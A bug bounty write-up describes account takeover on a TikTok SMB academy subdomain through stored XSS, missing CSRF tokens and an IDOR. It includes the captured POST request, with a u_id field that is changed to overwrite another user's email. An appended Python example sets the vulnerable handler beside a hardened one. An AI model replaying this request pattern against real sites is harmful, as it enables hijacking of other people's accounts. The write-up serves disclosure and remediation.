Multiple vulnerabilities leading to account takeover in a TikTok SMB subdomain.
I’m here to tell you how I achieved account takeover on a TikTok site. I submitted this bug on HackerOne and got $1000 for it.
This domain is third-party and out of scope, but they paid a bounty because it is a critical bug.
First: how did I find this domain? I took the URL from ads that arrived in my email.
Second: the URL is tiktoksmbacademyeu.com.
In the profile name and company name fields, the site is vulnerable to XSS, and the form is not protected against CSRF (there is no CSRF token). That alone works fine, and I could exploit users with CSRF, but here I found another bug: an IDOR. By changing the id from 1000 to any other id, you can change that user's email and name.
This is the HTTP request captured in Burp after I saved the profile settings:
POST /wp-content/themes/tiktok/includes/user/user.php HTTP/1.1
Host: tiktoksmbacademyeu.com

-----------------------------284212657035056129353908728991
Content-Disposition: form-data; name="action"

profile_edit
-----------------------------284212657035056129353908728991
Content-Disposition: form-data; name="name"

LukyJHKHJddd
-----------------------------284212657035056129353908728991
Content-Disposition: form-data; name="email"

hacked@protonmail.ch
-----------------------------284212657035056129353908728991
Content-Disposition: form-data; name="country"

Anguilla
-----------------------------284212657035056129353908728991
Content-Disposition: form-data; name="company_name"

hacked
-----------------------------284212657035056129353908728991
Content-Disposition: form-data; name="u_id"

1504
-----------------------------284212657035056129353908728991
Content-Disposition: form-data; name="upload_an_image"

-----------------------------284212657035056129353908728991--
I created another account and saw that u_id had changed from 1504 to 1505.
In Burp I modified the request, changing the id from 1504 to 1505.
Both accounts then had the same email :D. The IDOR works.
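The request above shows the root cause: the endpoint decides which record to update from the client-supplied u_id field, accepts no CSRF token, and stores the name and company fields without output encoding. The following is an added, framework-neutral Python illustration of that flaw beside a hardened handler; it is not the site's PHP code and the users, ids and session layout are constructed for the demo. The hardened version binds the edit to the server-side session user, checks a session-bound CSRF token, validates the fields, and HTML-escapes stored values at render time.

```python
import hmac
import html
import re
import secrets
from dataclasses import dataclass


@dataclass
class User:
    uid: int
    name: str
    email: str
    company: str = ""


def sample_users() -> dict:
    """Constructed data mirroring the write-up: the tester owns 1504, 1505 belongs to someone else."""
    return {
        1504: User(1504, "tester", "tester@example.invalid"),
        1505: User(1505, "victim", "victim@example.invalid", "Victim Co"),
    }


EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


class Rejected(Exception):
    """Raised by the hardened handler when a request fails a control."""


def profile_edit_vulnerable(session: dict, form: dict, users: dict) -> User:
    """The flaw as described: the target row comes from form['u_id'] (IDOR),
    nothing ties the request to the logged-in user or to a CSRF token,
    and the values are stored verbatim (stored XSS in name / company)."""
    target = users[int(form["u_id"])]
    target.name = form["name"]
    target.email = form["email"]
    target.company = form.get("company_name", "")
    return target


def issue_csrf_token(session: dict) -> str:
    """Generate a per-session CSRF token; the form must echo it back."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def profile_edit_hardened(session: dict, form: dict, users: dict) -> User:
    # 1. CSRF: compare the submitted token with the one in the server-side session
    #    using a constant-time comparison.
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        raise Rejected("missing or invalid CSRF token")
    # 2. IDOR: the subject of the edit is the authenticated user, never form['u_id'].
    if "user_id" not in session:
        raise Rejected("not authenticated")
    me = session["user_id"]
    # A client-supplied u_id that disagrees with the session is a tampering signal
    # worth logging and rejecting rather than silently ignoring.
    if "u_id" in form and str(form["u_id"]) != str(me):
        raise Rejected("u_id does not match session user; possible tampering")
    target = users[me]
    # 3. Input validation: bounded lengths and a plausible e-mail address.
    name = form.get("name", "").strip()
    email = form.get("email", "").strip()
    if not (1 <= len(name) <= 64) or not EMAIL_RE.match(email):
        raise Rejected("invalid name or e-mail")
    target.name = name
    target.email = email
    target.company = form.get("company_name", "").strip()[:128]
    return target


def render_profile(user: User) -> str:
    """Output encoding: whatever was stored in name/company cannot execute as markup."""
    return (f"<p>Name: {html.escape(user.name)}</p>"
            f"<p>Company: {html.escape(user.company)}</p>")


if __name__ == "__main__":
    users = sample_users()
    session = {"user_id": 1504}
    attack = {"name": "LukyJHKHJddd", "email": "hacked@protonmail.ch", "u_id": "1505"}
    profile_edit_vulnerable(session, attack, users)
    print("vulnerable handler: victim e-mail is now", users[1505].email)
    users = sample_users()
    token = issue_csrf_token(session)
    try:
        profile_edit_hardened(session, dict(attack, csrf_token=token), users)
    except Rejected as exc:
        print("hardened handler rejected the request:", exc)
    print("victim e-mail unchanged:", users[1505].email)
```

In a WordPress theme endpoint such as the one in the request, the equivalent controls are wp_verify_nonce() for the CSRF token, get_current_user_id() instead of a posted u_id, and esc_html() when echoing profile fields; the Python above only models that logic so it can be run and tested offline. The rejection in step 2 is also a useful detection point: a u_id that disagrees with the session user is exactly the request shape an IDOR attempt produces.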
Video PoC:
https://twitter.com/PinkDraconian/status/1490760255973863424